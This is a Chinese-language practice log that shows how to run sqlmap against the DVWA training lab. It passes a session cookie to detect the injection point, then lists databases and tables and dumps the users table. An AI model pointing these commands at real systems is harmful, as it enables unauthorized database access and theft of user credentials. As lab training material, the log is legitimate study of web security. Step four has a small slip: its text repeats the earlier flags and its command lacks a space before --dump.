DVWA练习记录--使用sqlmap实现SQL注入

准备:

1.sqlmap官网下载(这里我用的是kali自带的sqlmap)

2.DVWA靶场搭建(教程很多可以自己去搜)

一:检测注入点是否存在

sqlmap -u "http://IP/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="COOKIE"   

        sqlmap中,-u后面跟检测网址,--cookie后接当前会话的cookies

        1.IP:

        IP是DVWA所在虚拟机上的IP,默认127.0.0.1,如果不是在同一个虚拟机上使用sqlmap进行检测,则需要先得到DVWA所在虚拟机上的IP。

        2.COOKIE:

        cookies值获取过程如下:

                a.按F12键后点到网络一栏,点击重新加载。

DVWA练习记录--使用sqlmap实现SQL注入_第1张图片

                b.重新加载后单击第一行。

DVWA练习记录--使用sqlmap实现SQL注入_第2张图片

                c.右边得到请求头一栏的cookies。

DVWA练习记录--使用sqlmap实现SQL注入_第3张图片

        输入命令,检测到漏洞。DVWA练习记录--使用sqlmap实现SQL注入_第4张图片

二:获取数据库名

只需在原来命令后加上 --dbs

sqlmap -u "http://IP/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="COOKIE" --dbs

dbs指database server,获取所有数据库名。

DVWA练习记录--使用sqlmap实现SQL注入_第5张图片

三:获取数据库表

只需在最初命令后加上 -D dvwa --tables

sqlmap -u "http://IP/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="COOKIE" -D dvwa --tables

1.-D后跟指定的数据库,这里是dvwa

2.--tables列出数据库表

得到dvwa数据库下的两个表:

DVWA练习记录--使用sqlmap实现SQL注入_第6张图片

四:读取数据库表

只需在最初命令后加上 -D dvwa --tables

sqlmap -u "http://IP/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="COOKIE" -D dvwa -T users--dump

1.-T后跟指定的表名,这里是users

2.--dump读取数据

一路回车得到数据库内容

DVWA练习记录--使用sqlmap实现SQL注入_第7张图片

附:参考视频

你可能感兴趣的:(网络安全)